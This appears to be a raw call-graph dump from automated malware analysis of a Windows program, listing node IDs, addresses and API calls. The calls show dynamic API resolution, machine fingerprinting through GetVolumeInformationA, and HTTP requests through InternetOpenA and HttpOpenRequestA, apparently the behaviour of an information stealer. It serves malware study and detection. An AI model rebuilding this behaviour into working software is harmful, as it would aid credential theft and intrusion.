13381 81590 lstrcpy 13380->13381 13382 95f9a 13381->13382 13383 85960 34 API calls 13382->13383 13384 95fa0 13383->13384 13478 845d1 RtlAllocateHeap 13477->13478 13481 84621 VirtualProtect 13478->13481 13481->13126 13482->13213 13485 810c2 ctype 13483->13485 13484 810fd 13484->13243 13485->13484 13486 810e2 VirtualFree 13485->13486 13486->13484 13488 81233 GlobalMemoryStatusEx 13487->13488 13488->13247 13489->13270 13491 9a7c2 13490->13491 13492 9a7ec 13491->13492 13493 9a7da lstrcpy 13491->13493 13492->13274 13493->13492 13495 9a740 lstrcpy 13494->13495 13496 96833 13495->13496 13497 9a9b0 4 API calls 13496->13497 13498 96845 13497->13498 13499 9a8a0 lstrcpy 13498->13499 13500 9684e 13499->13500 13501 9a9b0 4 API calls 13500->13501 13502 96867 13501->13502 13503 9a8a0 lstrcpy 13502->13503 13504 96870 13503->13504 13505 9a9b0 4 API calls 13504->13505 13506 9688a 13505->13506 13507 9a8a0 lstrcpy 13506->13507 13508 96893 13507->13508 13509 9a9b0 4 API calls 13508->13509 13510 968ac 13509->13510 13511 9a8a0 lstrcpy 13510->13511 13512 968b5 13511->13512 13513 9a9b0 4 API calls 13512->13513 13514 968cf 13513->13514 13515 9a8a0 lstrcpy 13514->13515 13516 968d8 13515->13516 13517 9a9b0 4 API calls 13516->13517 13518 968f3 13517->13518 13519 9a8a0 lstrcpy 13518->13519 13520 968fc 13519->13520 13521 9a7a0 lstrcpy 13520->13521 13522 96910 13521->13522 13522->13282 13524 9a812 13523->13524 13524->13285 13527 9a83f 13525->13527 13526 95b54 13526->13295 13527->13526 13528 9a87b lstrcpy 13527->13528 13528->13526 13530 9a8a0 lstrcpy 13529->13530 13531 96443 13530->13531 13532 9a8a0 lstrcpy 13531->13532 13533 96455 13532->13533 13534 9a8a0 lstrcpy 13533->13534 13535 96467 13534->13535 13536 9a8a0 lstrcpy 13535->13536 13537 95b86 13536->13537 13537->13301 13539 845c0 2 API calls 13538->13539 13540 826b4 13539->13540 13541 845c0 2 API calls 13540->13541 13542 826d7 13541->13542 13543 845c0 2 API calls 13542->13543 13544 826f0 13543->13544 13545 845c0 2 API calls 13544->13545 13546 82709 13545->13546 13547 845c0 2 API calls 13546->13547 13548 82736 13547->13548 13549 845c0 2 API calls 13548->13549 13550 8274f 13549->13550 13551 845c0 2 API calls 13550->13551 13552 82768 13551->13552 13553 845c0 2 API calls 13552->13553 13554 82795 13553->13554 13555 845c0 2 API calls 13554->13555 13556 827ae 13555->13556 13557 845c0 2 API calls 13556->13557 13558 827c7 13557->13558 13559 845c0 2 API calls 13558->13559 13560 827e0 13559->13560 13561 845c0 2 API calls 13560->13561 13562 827f9 13561->13562 13563 845c0 2 API calls 13562->13563 13564 82812 13563->13564 13565 845c0 2 API calls 13564->13565 13566 8282b 13565->13566 13567 845c0 2 API calls 13566->13567 13568 82844 13567->13568 13569 845c0 2 API calls 13568->13569 13570 8285d 13569->13570 13571 845c0 2 API calls 13570->13571 13572 82876 13571->13572 13573 845c0 2 API calls 13572->13573 13574 8288f 13573->13574 13575 845c0 2 API calls 13574->13575 13576 828a8 13575->13576 13577 845c0 2 API calls 13576->13577 13578 828c1 13577->13578 13579 845c0 2 API calls 13578->13579 13580 828da 13579->13580 13581 845c0 2 API calls 13580->13581 13582 828f3 13581->13582 13583 845c0 2 API calls 13582->13583 13584 8290c 13583->13584 13585 845c0 2 API calls 13584->13585 13586 82925 13585->13586 13587 845c0 2 API calls 13586->13587 13588 8293e 13587->13588 13589 845c0 2 API calls 13588->13589 13590 82957 13589->13590 13591 845c0 2 API calls 13590->13591 13592 82970 13591->13592 13593 845c0 2 API calls 13592->13593 13594 82989 13593->13594 13595 845c0 2 API calls 13594->13595 13596 829a2 13595->13596 13597 845c0 2 API calls 13596->13597 13598 829bb 13597->13598 13599 845c0 2 API calls 13598->13599 13600 829d4 13599->13600 13601 845c0 2 API calls 13600->13601 13602 829ed 13601->13602 13603 845c0 2 API calls 13602->13603 13604 82a06 13603->13604 13605 845c0 2 API calls 13604->13605 13606 82a1f 13605->13606 13607 845c0 2 API calls 13606->13607 13608 82a38 13607->13608 13609 845c0 2 API calls 13608->13609 13610 82a51 13609->13610 13611 845c0 2 API calls 13610->13611 13612 82a6a 13611->13612 13613 845c0 2 API calls 13612->13613 13614 82a83 13613->13614 13615 845c0 2 API calls 13614->13615 13616 82a9c 13615->13616 13617 845c0 2 API calls 13616->13617 13618 82ab5 13617->13618 13619 845c0 2 API calls 13618->13619 13620 82ace 13619->13620 13621 845c0 2 API calls 13620->13621 13622 82ae7 13621->13622 13623 845c0 2 API calls 13622->13623 13624 82b00 13623->13624 13625 845c0 2 API calls 13624->13625 13626 82b19 13625->13626 13627 845c0 2 API calls 13626->13627 13628 82b32 13627->13628 13629 845c0 2 API calls 13628->13629 13630 82b4b 13629->13630 13631 845c0 2 API calls 13630->13631 13632 82b64 13631->13632 13633 845c0 2 API calls 13632->13633 13634 82b7d 13633->13634 13635 845c0 2 API calls 13634->13635 13636 82b96 13635->13636 13637 845c0 2 API calls 13636->13637 13638 82baf 13637->13638 13639 845c0 2 API calls 13638->13639 13640 82bc8 13639->13640 13641 845c0 2 API calls 13640->13641 13642 82be1 13641->13642 13643 845c0 2 API calls 13642->13643 13644 82bfa 13643->13644 13645 845c0 2 API calls 13644->13645 13646 82c13 13645->13646 13647 845c0 2 API calls 13646->13647 13648 82c2c 13647->13648 13649 845c0 2 API calls 13648->13649 13650 82c45 13649->13650 13651 845c0 2 API calls 13650->13651 13652 82c5e 13651->13652 13653 845c0 2 API calls 13652->13653 13654 82c77 13653->13654 13655 845c0 2 API calls 13654->13655 13656 82c90 13655->13656 13657 845c0 2 API calls 13656->13657 13658 82ca9 13657->13658 13659 845c0 2 API calls 13658->13659 13660 82cc2 13659->13660 13661 845c0 2 API calls 13660->13661 13662 82cdb 13661->13662 13663 845c0 2 API calls 13662->13663 13664 82cf4 13663->13664 13665 845c0 2 API calls 13664->13665 13666 82d0d 13665->13666 13667 845c0 2 API calls 13666->13667 13668 82d26 13667->13668 13669 845c0 2 API calls 13668->13669 13670 82d3f 13669->13670 13671 845c0 2 API calls 13670->13671 13672 82d58 13671->13672 13673 845c0 2 API calls 13672->13673 13674 82d71 13673->13674 13675 845c0 2 API calls 13674->13675 13676 82d8a 13675->13676 13677 845c0 2 API calls 13676->13677 13678 82da3 13677->13678 13679 845c0 2 API calls 13678->13679 13680 82dbc 13679->13680 13681 845c0 2 API calls 13680->13681 13682 82dd5 13681->13682 13683 845c0 2 API calls 13682->13683 13684 82dee 13683->13684 13685 845c0 2 API calls 13684->13685 13686 82e07 13685->13686 13687 845c0 2 API calls 13686->13687 13688 82e20 13687->13688 13689 845c0 2 API calls 13688->13689 13690 82e39 13689->13690 13691 845c0 2 API calls 13690->13691 13692 82e52 13691->13692 13693 845c0 2 API calls 13692->13693 13694 82e6b 13693->13694 13695 845c0 2 API calls 13694->13695 13696 82e84 13695->13696 13697 845c0 2 API calls 13696->13697 13698 82e9d 13697->13698 13699 845c0 2 API calls 13698->13699 13700 82eb6 13699->13700 13701 845c0 2 API calls 13700->13701 13702 82ecf 13701->13702 13703 845c0 2 API calls 13702->13703 13704 82ee8 13703->13704 13705 845c0 2 API calls 13704->13705 13706 82f01 13705->13706 13707 845c0 2 API calls 13706->13707 13708 82f1a 13707->13708 13709 845c0 2 API calls 13708->13709 13710 82f33 13709->13710 13711 845c0 2 API calls 13710->13711 13712 82f4c 13711->13712 13713 845c0 2 API calls 13712->13713 13714 82f65 13713->13714 13715 845c0 2 API calls 13714->13715 13716 82f7e 13715->13716 13717 845c0 2 API calls 13716->13717 13718 82f97 13717->13718 13719 845c0 2 API calls 13718->13719 13720 82fb0 13719->13720 13721 845c0 2 API calls 13720->13721 13722 82fc9 13721->13722 13723 845c0 2 API calls 13722->13723 13724 82fe2 13723->13724 13725 845c0 2 API calls 13724->13725 13726 82ffb 13725->13726 13727 845c0 2 API calls 13726->13727 13728 83014 13727->13728 13729 845c0 2 API calls 13728->13729 13730 8302d 13729->13730 13731 845c0 2 API calls 13730->13731 13732 83046 13731->13732 13733 845c0 2 API calls 13732->13733 13734 8305f 13733->13734 13735 845c0 2 API calls 13734->13735 13736 83078 13735->13736 13737 845c0 2 API calls 13736->13737 13738 83091 13737->13738 13739 845c0 2 API calls 13738->13739 13740 830aa 13739->13740 13741 845c0 2 API calls 13740->13741 13742 830c3 13741->13742 13743 845c0 2 API calls 13742->13743 13744 830dc 13743->13744 13745 845c0 2 API calls 13744->13745 13746 830f5 13745->13746 13747 845c0 2 API calls 13746->13747 13748 8310e 13747->13748 13749 845c0 2 API calls 13748->13749 13750 83127 13749->13750 13751 845c0 2 API calls 13750->13751 13752 83140 13751->13752 13753 845c0 2 API calls 13752->13753 13754 83159 13753->13754 13755 845c0 2 API calls 13754->13755 13756 83172 13755->13756 13757 845c0 2 API calls 13756->13757 13758 8318b 13757->13758 13759 845c0 2 API calls 13758->13759 13760 831a4 13759->13760 13761 845c0 2 API calls 13760->13761 13762 831bd 13761->13762 13763 845c0 2 API calls 13762->13763 13764 831d6 13763->13764 13765 845c0 2 API calls 13764->13765 13766 831ef 13765->13766 13767 845c0 2 API calls 13766->13767 13768 83208 13767->13768 13769 845c0 2 API calls 13768->13769 13770 83221 13769->13770 13771 845c0 2 API calls 13770->13771 13772 8323a 13771->13772 13773 845c0 2 API calls 13772->13773 13774 83253 13773->13774 13775 845c0 2 API calls 13774->13775 13776 8326c 13775->13776 13777 845c0 2 API calls 13776->13777 13778 83285 13777->13778 13779 845c0 2 API calls 13778->13779 13780 8329e 13779->13780 13781 845c0 2 API calls 13780->13781 13782 832b7 13781->13782 13783 845c0 2 API calls 13782->13783 13784 832d0 13783->13784 13785 845c0 2 API calls 13784->13785 13786 832e9 13785->13786 13787 845c0 2 API calls 13786->13787 13788 83302 13787->13788 13789 845c0 2 API calls 13788->13789 13790 8331b 13789->13790 13791 845c0 2 API calls 13790->13791 13792 83334 13791->13792 13793 845c0 2 API calls 13792->13793 13794 8334d 13793->13794 13795 845c0 2 API calls 13794->13795 13796 83366 13795->13796 13797 845c0 2 API calls 13796->13797 13798 8337f 13797->13798 13799 845c0 2 API calls 13798->13799 13800 83398 13799->13800 13801 845c0 2 API calls 13800->13801 13802 833b1 13801->13802 13803 845c0 2 API calls 13802->13803 13804 833ca 13803->13804 13805 845c0 2 API calls 13804->13805 13806 833e3 13805->13806 13807 845c0 2 API calls 13806->13807 13808 833fc 13807->13808 13809 845c0 2 API calls 13808->13809 13810 83415 13809->13810 13811 845c0 2 API calls 13810->13811 13812 8342e 13811->13812 13813 845c0 2 API calls 13812->13813 13814 83447 13813->13814 13815 845c0 2 API calls 13814->13815 13816 83460 13815->13816 13817 845c0 2 API calls 13816->13817 13818 83479 13817->13818 13819 845c0 2 API calls 13818->13819 13820 83492 13819->13820 13821 845c0 2 API calls 13820->13821 13822 834ab 13821->13822 13823 845c0 2 API calls 13822->13823 13824 834c4 13823->13824 13825 845c0 2 API calls 13824->13825 13826 834dd 13825->13826 13827 845c0 2 API calls 13826->13827 13828 834f6 13827->13828 13829 845c0 2 API calls 13828->13829 13830 8350f 13829->13830 13831 845c0 2 API calls 13830->13831 13832 83528 13831->13832 13833 845c0 2 API calls 13832->13833 13834 83541 13833->13834 13835 845c0 2 API calls 13834->13835 13836 8355a 13835->13836 13837 845c0 2 API calls 13836->13837 13838 83573 13837->13838 13839 845c0 2 API calls 13838->13839 13840 8358c 13839->13840 13841 845c0 2 API calls 13840->13841 13842 835a5 13841->13842 13843 845c0 2 API calls 13842->13843 13844 835be 13843->13844 13845 845c0 2 API calls 13844->13845 13846 835d7 13845->13846 13847 845c0 2 API calls 13846->13847 13848 835f0 13847->13848 13849 845c0 2 API calls 13848->13849 13850 83609 13849->13850 13851 845c0 2 API calls 13850->13851 13852 83622 13851->13852 13853 845c0 2 API calls 13852->13853 13854 8363b 13853->13854 13855 845c0 2 API calls 13854->13855 13856 83654 13855->13856 13857 845c0 2 API calls 13856->13857 13858 8366d 13857->13858 13859 845c0 2 API calls 13858->13859 13860 83686 13859->13860 13861 845c0 2 API calls 13860->13861 13862 8369f 13861->13862 13863 845c0 2 API calls 13862->13863 13864 836b8 13863->13864 13865 845c0 2 API calls 13864->13865 13866 836d1 13865->13866 13867 845c0 2 API calls 13866->13867 13868 836ea 13867->13868 13869 845c0 2 API calls 13868->13869 13870 83703 13869->13870 13871 845c0 2 API calls 13870->13871 13872 8371c 13871->13872 13873 845c0 2 API calls 13872->13873 13874 83735 13873->13874 13875 845c0 2 API calls 13874->13875 13876 8374e 13875->13876 13877 845c0 2 API calls 13876->13877 13878 83767 13877->13878 13879 845c0 2 API calls 13878->13879 13880 83780 13879->13880 13881 845c0 2 API calls 13880->13881 13882 83799 13881->13882 13883 845c0 2 API calls 13882->13883 13884 837b2 13883->13884 13885 845c0 2 API calls 13884->13885 13886 837cb 13885->13886 13887 845c0 2 API calls 13886->13887 13888 837e4 13887->13888 13889 845c0 2 API calls 13888->13889 13890 837fd 13889->13890 13891 845c0 2 API calls 13890->13891 13892 83816 13891->13892 13893 845c0 2 API calls 13892->13893 13894 8382f 13893->13894 13895 845c0 2 API calls 13894->13895 13896 83848 13895->13896 13897 845c0 2 API calls 13896->13897 13898 83861 13897->13898 13899 845c0 2 API calls 13898->13899 13900 8387a 13899->13900 13901 845c0 2 API calls 13900->13901 13902 83893 13901->13902 13903 845c0 2 API calls 13902->13903 13904 838ac 13903->13904 13905 845c0 2 API calls 13904->13905 13906 838c5 13905->13906 13907 845c0 2 API calls 13906->13907 13908 838de 13907->13908 13909 845c0 2 API calls 13908->13909 13910 838f7 13909->13910 13911 845c0 2 API calls 13910->13911 13912 83910 13911->13912 13913 845c0 2 API calls 13912->13913 13914 83929 13913->13914 13915 845c0 2 API calls 13914->13915 13916 83942 13915->13916 13917 845c0 2 API calls 13916->13917 13918 8395b 13917->13918 13919 845c0 2 API calls 13918->13919 13920 83974 13919->13920 13921 845c0 2 API calls 13920->13921 13922 8398d 13921->13922 13923 845c0 2 API calls 13922->13923 13924 839a6 13923->13924 13925 845c0 2 API calls 13924->13925 13926 839bf 13925->13926 13927 845c0 2 API calls 13926->13927 13928 839d8 13927->13928 13929 845c0 2 API calls 13928->13929 13930 839f1 13929->13930 13931 845c0 2 API calls 13930->13931 13932 83a0a 13931->13932 13933 845c0 2 API calls 13932->13933 13934 83a23 13933->13934 13935 845c0 2 API calls 13934->13935 13936 83a3c 13935->13936 13937 845c0 2 API calls 13936->13937 13938 83a55 13937->13938 13939 845c0 2 API calls 13938->13939 13940 83a6e 13939->13940 13941 845c0 2 API calls 13940->13941 13942 83a87 13941->13942 13943 845c0 2 API calls 13942->13943 13944 83aa0 13943->13944 13945 845c0 2 API calls 13944->13945 13946 83ab9 13945->13946 13947 845c0 2 API calls 13946->13947 13948 83ad2 13947->13948 13949 845c0 2 API calls 13948->13949 13950 83aeb 13949->13950 13951 845c0 2 API calls 13950->13951 13952 83b04 13951->13952 13953 845c0 2 API calls 13952->13953 13954 83b1d 13953->13954 13955 845c0 2 API calls 13954->13955 13956 83b36 13955->13956 13957 845c0 2 API calls 13956->13957 13958 83b4f 13957->13958 13959 845c0 2 API calls 13958->13959 13960 83b68 13959->13960 13961 845c0 2 API calls 13960->13961 13962 83b81 13961->13962 13963 845c0 2 API calls 13962->13963 13964 83b9a 13963->13964 13965 845c0 2 API calls 13964->13965 13966 83bb3 13965->13966 13967 845c0 2 API calls 13966->13967 13968 83bcc 13967->13968 13969 845c0 2 API calls 13968->13969 13970 83be5 13969->13970 13971 845c0 2 API calls 13970->13971 13972 83bfe 13971->13972 13973 845c0 2 API calls 13972->13973 13974 83c17 13973->13974 13975 845c0 2 API calls 13974->13975 13976 83c30 13975->13976 13977 845c0 2 API calls 13976->13977 13978 83c49 13977->13978 13979 845c0 2 API calls 13978->13979 13980 83c62 13979->13980 13981 845c0 2 API calls 13980->13981 13982 83c7b 13981->13982 13983 845c0 2 API calls 13982->13983 13984 83c94 13983->13984 13985 845c0 2 API calls 13984->13985 13986 83cad 13985->13986 13987 845c0 2 API calls 13986->13987 13988 83cc6 13987->13988 13989 845c0 2 API calls 13988->13989 13990 83cdf 13989->13990 13991 845c0 2 API calls 13990->13991 13992 83cf8 13991->13992 13993 845c0 2 API calls 13992->13993 13994 83d11 13993->13994 13995 845c0 2 API calls 13994->13995 13996 83d2a 13995->13996 13997 845c0 2 API calls 13996->13997 13998 83d43 13997->13998 13999 845c0 2 API calls 13998->13999 14000 83d5c 13999->14000 14001 845c0 2 API calls 14000->14001 14002 83d75 14001->14002 14003 845c0 2 API calls 14002->14003 14004 83d8e 14003->14004 14005 845c0 2 API calls 14004->14005 14006 83da7 14005->14006 14007 845c0 2 API calls 14006->14007 14008 83dc0 14007->14008 14009 845c0 2 API calls 14008->14009 14010 83dd9 14009->14010 14011 845c0 2 API calls 14010->14011 14012 83df2 14011->14012 14013 845c0 2 API calls 14012->14013 14014 83e0b 14013->14014 14015 845c0 2 API calls 14014->14015 14016 83e24 14015->14016 14017 845c0 2 API calls 14016->14017 14018 83e3d 14017->14018 14019 845c0 2 API calls 14018->14019 14020 83e56 14019->14020 14021 845c0 2 API calls 14020->14021 14022 83e6f 14021->14022 14023 845c0 2 API calls 14022->14023 14024 83e88 14023->14024 14025 845c0 2 API calls 14024->14025 14026 83ea1 14025->14026 14027 845c0 2 API calls 14026->14027 14028 83eba 14027->14028 14029 845c0 2 API calls 14028->14029 14030 83ed3 14029->14030 14031 845c0 2 API calls 14030->14031 14032 83eec 14031->14032 14033 845c0 2 API calls 14032->14033 14034 83f05 14033->14034 14035 845c0 2 API calls 14034->14035 14036 83f1e 14035->14036 14037 845c0 2 API calls 14036->14037 14038 83f37 14037->14038 14039 845c0 2 API calls 14038->14039 14040 83f50 14039->14040 14041 845c0 2 API calls 14040->14041 14042 83f69 14041->14042 14043 845c0 2 API calls 14042->14043 14044 83f82 14043->14044 14045 845c0 2 API calls 14044->14045 14046 83f9b 14045->14046 14047 845c0 2 API calls 14046->14047 14048 83fb4 14047->14048 14049 845c0 2 API calls 14048->14049 14050 83fcd 14049->14050 14051 845c0 2 API calls 14050->14051 14052 83fe6 14051->14052 14053 845c0 2 API calls 14052->14053 14054 83fff 14053->14054 14055 845c0 2 API calls 14054->14055 14056 84018 14055->14056 14057 845c0 2 API calls 14056->14057 14058 84031 14057->14058 14059 845c0 2 API calls 14058->14059 14060 8404a 14059->14060 14061 845c0 2 API calls 14060->14061 14062 84063 14061->14062 14063 845c0 2 API calls 14062->14063 14064 8407c 14063->14064 14065 845c0 2 API calls 14064->14065 14066 84095 14065->14066 14067 845c0 2 API calls 14066->14067 14068 840ae 14067->14068 14069 845c0 2 API calls 14068->14069 14070 840c7 14069->14070 14071 845c0 2 API calls 14070->14071 14072 840e0 14071->14072 14073 845c0 2 API calls 14072->14073 14074 840f9 14073->14074 14075 845c0 2 API calls 14074->14075 14076 84112 14075->14076 14077 845c0 2 API calls 14076->14077 14078 8412b 14077->14078 14079 845c0 2 API calls 14078->14079 14080 84144 14079->14080 14081 845c0 2 API calls 14080->14081 14082 8415d 14081->14082 14083 845c0 2 API calls 14082->14083 14084 84176 14083->14084 14085 845c0 2 API calls 14084->14085 14086 8418f 14085->14086 14087 845c0 2 API calls 14086->14087 14088 841a8 14087->14088 14089 845c0 2 API calls 14088->14089 14090 841c1 14089->14090 14091 845c0 2 API calls 14090->14091 14092 841da 14091->14092 14093 845c0 2 API calls 14092->14093 14094 841f3 14093->14094 14095 845c0 2 API calls 14094->14095 14096 8420c 14095->14096 14097 845c0 2 API calls 14096->14097 14098 84225 14097->14098 14099 845c0 2 API calls 14098->14099 14100 8423e 14099->14100 14101 845c0 2 API calls 14100->14101 14102 84257 14101->14102 14103 845c0 2 API calls 14102->14103 14104 84270 14103->14104 14105 845c0 2 API calls 14104->14105 14106 84289 14105->14106 14107 845c0 2 API calls 14106->14107 14108 842a2 14107->14108 14109 845c0 2 API calls 14108->14109 14110 842bb 14109->14110 14111 845c0 2 API calls 14110->14111 14112 842d4 14111->14112 14113 845c0 2 API calls 14112->14113 14114 842ed 14113->14114 14115 845c0 2 API calls 14114->14115 14116 84306 14115->14116 14117 845c0 2 API calls 14116->14117 14118 8431f 14117->14118 14119 845c0 2 API calls 14118->14119 14120 84338 14119->14120 14121 845c0 2 API calls 14120->14121 14122 84351 14121->14122 14123 845c0 2 API calls 14122->14123 14124 8436a 14123->14124 14125 845c0 2 API calls 14124->14125 14126 84383 14125->14126 14127 845c0 2 API calls 14126->14127 14128 8439c 14127->14128 14129 845c0 2 API calls 14128->14129 14130 843b5 14129->14130 14131 845c0 2 API calls 14130->14131 14132 843ce 14131->14132 14133 845c0 2 API calls 14132->14133 14134 843e7 14133->14134 14135 845c0 2 API calls 14134->14135 14136 84400 14135->14136 14137 845c0 2 API calls 14136->14137 14138 84419 14137->14138 14139 845c0 2 API calls 14138->14139 14140 84432 14139->14140 14141 845c0 2 API calls 14140->14141 14142 8444b 14141->14142 14143 845c0 2 API calls 14142->14143 14144 84464 14143->14144 14145 845c0 2 API calls 14144->14145 14146 8447d 14145->14146 14147 845c0 2 API calls 14146->14147 14148 84496 14147->14148 14149 845c0 2 API calls 14148->14149 14150 844af 14149->14150 14151 845c0 2 API calls 14150->14151 14152 844c8 14151->14152 14153 845c0 2 API calls 14152->14153 14154 844e1 14153->14154 14155 845c0 2 API calls 14154->14155 14156 844fa 14155->14156 14157 845c0 2 API calls 14156->14157 14158 84513 14157->14158 14159 845c0 2 API calls 14158->14159 14160 8452c 14159->14160 14161 845c0 2 API calls 14160->14161 14162 84545 14161->14162 14163 845c0 2 API calls 14162->14163 14164 8455e 14163->14164 14165 845c0 2 API calls 14164->14165 14166 84577 14165->14166 14167 845c0 2 API calls 14166->14167 14168 84590 14167->14168 14169 845c0 2 API calls 14168->14169 14170 845a9 14169->14170 14171 99c10 14170->14171 14172 99c20 43 API calls 14171->14172 14173 9a036 8 API calls 14171->14173 14172->14173 14174 9a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14173->14174 14175 9a146 14173->14175 14174->14175 14176 9a153 8 API calls 14175->14176 14177 9a216 14175->14177 14176->14177 14178 9a298 14177->14178 14179 9a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14177->14179 14180 9a2a5 6 API calls 14178->14180 14181 9a337 14178->14181 14179->14178 14180->14181 14182 9a41f 14181->14182 14183 9a344 9 API calls 14181->14183 14184 9a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14182->14184 14185 9a4a2 14182->14185 14183->14182 14184->14185 14186 9a4ab GetProcAddress GetProcAddress 14185->14186 14187 9a4dc 14185->14187 14186->14187 14188 9a515 14187->14188 14189 9a4e5 GetProcAddress GetProcAddress 14187->14189 14190 9a612 14188->14190 14191 9a522 10 API calls 14188->14191 14189->14188 14192 9a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14190->14192 14193 9a67d 14190->14193 14191->14190 14192->14193 14194 9a69e 14193->14194 14195 9a686 GetProcAddress 14193->14195 14196 95ca3 14194->14196 14197 9a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14194->14197 14195->14194 14198 81590 14196->14198 14197->14196 15319 81670 14198->15319 14201 9a7a0 lstrcpy 14202 815b5 14201->14202 14203 9a7a0 lstrcpy 14202->14203 14204 815c7 14203->14204 14205 9a7a0 lstrcpy 14204->14205 14206 815d9 14205->14206 14207 9a7a0 lstrcpy 14206->14207 14208 81663 14207->14208 14209 95510 14208->14209 14210 95521 14209->14210 14211 9a820 2 API calls 14210->14211 14212 9552e 14211->14212 14213 9a820 2 API calls 14212->14213 14214 9553b 14213->14214 14215 9a820 2 API calls 14214->14215 14216 95548 14215->14216 14217 9a740 lstrcpy 14216->14217 14218 95555 14217->14218 14219 9a740 lstrcpy 14218->14219 14220 95562 14219->14220 14221 9a740 lstrcpy 14220->14221 14222 9556f 14221->14222 14223 9a740 lstrcpy 14222->14223 14243 9557c 14223->14243 14224 9a740 lstrcpy 14224->14243 14225 95643 StrCmpCA 14225->14243 14226 956a0 StrCmpCA 14227 957dc 14226->14227 14226->14243 14228 9a8a0 lstrcpy 14227->14228 14229 957e8 14228->14229 14230 9a820 2 API calls 14229->14230 14232 957f6 14230->14232 14231 951f0 20 API calls 14231->14243 14234 9a820 2 API calls 14232->14234 14233 95856 StrCmpCA 14235 95991 14233->14235 14233->14243 14237 95805 14234->14237 14236 9a8a0 lstrcpy 14235->14236 14239 9599d 14236->14239 14240 81670 lstrcpy 14237->14240 14238 81590 lstrcpy 14238->14243 14241 9a820 2 API calls 14239->14241 14263 95811 14240->14263 14244 959ab 14241->14244 14242 9a820 lstrlen lstrcpy 14242->14243 14243->14224 14243->14225 14243->14226 14243->14231 14243->14233 14243->14238 14243->14242 14245 95a0b StrCmpCA 14243->14245 14249 9a7a0 lstrcpy 14243->14249 14256 952c0 25 API calls 14243->14256 14259 9578a StrCmpCA 14243->14259 14261 9593f StrCmpCA 14243->14261 14262 9a8a0 lstrcpy 14243->14262 14246 9a820 2 API calls 14244->14246 14247 95a28 14245->14247 14248 95a16 Sleep 14245->14248 14250 959ba 14246->14250 14251 9a8a0 lstrcpy 14247->14251 14248->14243 14249->14243 14252 81670 lstrcpy 14250->14252 14253 95a34 14251->14253 14252->14263 14254 9a820 2 API calls 14253->14254 14255 95a43 14254->14255 14257 9a820 2 API calls 14255->14257 14256->14243 14258 95a52 14257->14258 14260 81670 lstrcpy 14258->14260 14259->14243 14260->14263 14261->14243 14262->14243 14263->13316 14265 9754c 14264->14265 14266 97553 GetVolumeInformationA 14264->14266 14265->14266 14267 97591 14266->14267 14268 975fc GetProcessHeap RtlAllocateHeap 14267->14268 14269 97619 14268->14269 14270 97628 wsprintfA 14268->14270 14271 9a740 lstrcpy 14269->14271 14272 9a740 lstrcpy 14270->14272 14273 95da7 14271->14273 14272->14273 14273->13337 14275 9a7a0 lstrcpy 14274->14275 14276 84899 14275->14276 15328 847b0 14276->15328 14278 848a5 14279 9a740 lstrcpy 14278->14279 14280 848d7 14279->14280 14281 9a740 lstrcpy 14280->14281 14282 848e4 14281->14282 14283 9a740 lstrcpy 14282->14283 14284 848f1 14283->14284 14285 9a740 lstrcpy 14284->14285 14286 848fe 14285->14286 14287 9a740 lstrcpy 14286->14287 14288 8490b InternetOpenA StrCmpCA 14287->14288 14289 84944 14288->14289 14290 84ecb InternetCloseHandle 14289->14290 15334 98b60 14289->15334 14292 84ee8 14290->14292 15349 89ac0 CryptStringToBinaryA 14292->15349 14293 84963 15342 9a920 14293->15342 14297 84976 14298 9a8a0 lstrcpy 14297->14298 14303 8497f 14298->14303 14299 9a820 2 API calls 14300 84f05 14299->14300 14301 9a9b0 4 API calls 14300->14301 14304 84f1b 14301->14304 14302 84f27 ctype 14306 9a7a0 lstrcpy 14302->14306 14307 9a9b0 4 API calls 14303->14307 14305 9a8a0 lstrcpy 14304->14305 14305->14302 14319 84f57 14306->14319 14308 849a9 14307->14308 14309 9a8a0 lstrcpy 14308->14309 14310 849b2 14309->14310 14311 9a9b0 4 API calls 14310->14311 14312 849d1 14311->14312 14313 9a8a0 lstrcpy 14312->14313 14314 849da 14313->14314 14315 9a920 3 API calls 14314->14315 14316 849f8 14315->14316 14317 9a8a0 lstrcpy 14316->14317 14318 84a01 14317->14318 14320 9a9b0 4 API calls 14318->14320 14319->13340 14321 84a20 14320->14321 14322 9a8a0 lstrcpy 14321->14322 14323 84a29 14322->14323 14324 9a9b0 4 API calls 14323->14324 14325 84a48 14324->14325 14326 9a8a0 lstrcpy 14325->14326 14327 84a51 14326->14327 14328 9a9b0 4 API calls 14327->14328 14329 84a7d 14328->14329 14330 9a920 3 API calls 14329->14330 14331 84a84 14330->14331 14332 9a8a0 lstrcpy 14331->14332 14333 84a8d 14332->14333 14334 84aa3 InternetConnectA 14333->14334 14334->14290 14335 84ad3 HttpOpenRequestA 14334->14335 14337 84b28 14335->14337 14338 84ebe InternetCloseHandle 14335->14338 14339 9a9b0 4 API calls 14337->14339 14338->14290 14340 84b3c 14339->14340 14341 9a8a0 lstrcpy 14340->14341 14342 84b45 14341->14342 14343 9a920 3 API calls 14342->14343 14344 84b63 14343->14344 14345 9a8a0 lstrcpy 14344->14345 14346 84b6c 14345->14346 14347 9a9b0 4 API calls 14346->14347 14348 84b8b 14347->14348 14349 9a8a0 lstrcpy 14348->14349 14350 84b94 14349->14350 14351 9a9b0 4 API calls 14350->14351 14352 84bb5 14351->14352 14353 9a8a0 lstrcpy 14352->14353 14354 84bbe 14353->14354 14355 9a9b0 4 API calls 14354->14355 14356 84bde 14355->14356 14357 9a8a0 lstrcpy 14356->14357 14358 84be7 14357->14358 14359 9a9b0 4 API calls 14358->14359 14360 84c06 14359->14360 14361 9a8a0 lstrcpy 14360->14361 14362 84c0f 14361->14362 14363 9a920 3 API calls 14362->14363 14364 84c2d 14363->14364 14365 9a8a0 lstrcpy 14364->14365 14366 84c36 14365->14366 14367 9a9b0 4 API calls 14366->14367 14368 84c55 14367->14368 14369 9a8a0 lstrcpy 14368->14369 14370 84c5e 14369->14370 14371 9a9b0 4 API calls 14370->14371 14372 84c7d 14371->14372 14373 9a8a0 lstrcpy 14372->14373 14374 84c86 14373->14374 14375 9a920 3 API calls 14374->14375 14376 84ca4 14375->14376 14377 9a8a0 lstrcpy 14376->14377 14378 84cad 14377->14378 14379 9a9b0 4 API calls 14378->14379 14380 84ccc 14379->14380 14381 9a8a0 lstrcpy 14380->14381 14382 84cd5 14381->14382 14383 9a9b0 4 API calls 14382->14383 14384 84cf6 14383->14384 